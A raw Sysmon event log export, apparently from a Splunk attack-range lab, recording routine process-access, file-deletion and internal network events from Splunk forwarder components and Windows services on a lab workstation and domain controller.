11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-141F-6216-AC04-000000003902}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-141F-6216-AC04-000000003902}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.437{4F8D34B0-141F-6216-AC04-000000003902}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:52.761{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D6C27DB7A27F53EEEA3A2137A3DAC7B,SHA256=A97A0129795D6F2B72193EE837A179E4DDD98D2FDA30C59575C63D8B264E9E69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:52.468{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91733657B5F1668C8AC54D64098F2475,SHA256=6616963411AD90D6EEF9BC98362F8BB0AF945AD91DFB9ED6C321776CA2A5F971,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:53.771{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E029758B0EFCAD23801F3CF34083C076,SHA256=0D732C00ABA5A2F379B0D54888F5B4F9120D39A8F2ED114187B0BBC105CCA5B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.683{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51471-false10.0.1.12-8000- 23542300x8000000000000000218630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:53.063{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EB31FCD712C423BF2C4D0F8F434D54E,SHA256=F99814BCD1CD84C751E84540555409D840C0E9987CB5675444E8CC83A72CEFEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:54.789{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32B765D493717360C64CAD473E1ABD5D,SHA256=94DFF0A46A9B9A04195CC21CBA72CDAA57113CA7A066EC96E57D4BF298E91E08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:54.078{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D62A1154EEAE9AC6AC175B34FE75F476,SHA256=295EF9E64CABF0724DFAAD3F3B2F6EE68DE23FEE17742A863B23026C2E9D4112,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:52.716{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53882-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:55.800{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20DEDD22C5AA8C89ED129629761C45BF,SHA256=C34CD66E3B439DEAC2E3525E93FDD5FE4407ED228CA813B5377F0332ECB6BFF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:55.094{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B94C1FD1F0D7088A979BDFA5007B90,SHA256=F8B3F71174DDFE69E2563EE3CBB42013F52964FD33A4872517B12D488D529CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:56.803{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C5C2690A88A95062D3C9780CAFDC77,SHA256=35F33C7AA673A7F1D15B73DBCED33366B26C12678CA939C6DFFCEB82AF79B724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:56.141{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC0C3F3CC1E7B200FC3627D9AFA88D0F,SHA256=9369987887F07EECB098F1CEDCA90D0EB1562ADB9A17B46AF1795BC2525A528B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:57.818{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C69CBB061774DD542E163252847E1AD,SHA256=68260A4FCE61E2ED3C96D75F90E34ACF2FE0B57F4D248377E88D4B68A9CC2549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:57.172{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99EEEDFE56D98C991B79E665F762B1F1,SHA256=63EF3067F525555E18AF299E0C23FA185AD7EC89583AFDF1D59604A8F568D3EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:58.834{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6692DFF754C83B8555E4E9F228463950,SHA256=17BACD38F2EEA54855A57E116907EA30DBC7A39636726FA853910945A04DE0EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:58.344{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6191FBB32C8076C965B429811DC5D445,SHA256=0D17D8CFB9463DD0A6BE08716C0349F6CA06AD41093B5A38EDE094F823D4AA11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:59.860{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCDD2A62966D6F8E4C854E4259956F83,SHA256=6FDB834497487922858EA91B3D36F5AC2EAF51B4B5CF78553C930775B82173CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:59.562{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=407E8CCF44DB71385031F4FC937589B0,SHA256=75C9ED7C50A19A4BE4D53CCBC982564B1605C796028A497EFAA7C78A711CDA05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:00.881{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AC4FDB6A04A8DC5775F59B4B8C5AC8D,SHA256=F7AF5AC8C21C7769E8B51F71992A67CC4B1304FFC28214C3FE641A45213C7094,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:57.511{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51472-false10.0.1.12-8000- 23542300x8000000000000000218638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:00.609{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B324C008E22CE77B5D5EA5AD4E60944D,SHA256=C302F39320FC413C80DE58BC68E4F5EB43207AFBC3BD6E5D83D1287D4C090515,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.899{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E60A1E42F53D41965D653F70541E6598,SHA256=D90C3250BEBD3424619AF0A17101C7EB674FE24592D875A1EFE84A2BDB32D63A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:01.703{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20665E1B0CD64F551406C58EDCE8BC5B,SHA256=FF5EE12E887C8DEE7D47A1ACEAF90F066EDC9DDC9F89F9F90457529AB2DAB764,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:58.680{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53883-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000294328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.483{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1429-6216-8D06-000000003802}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 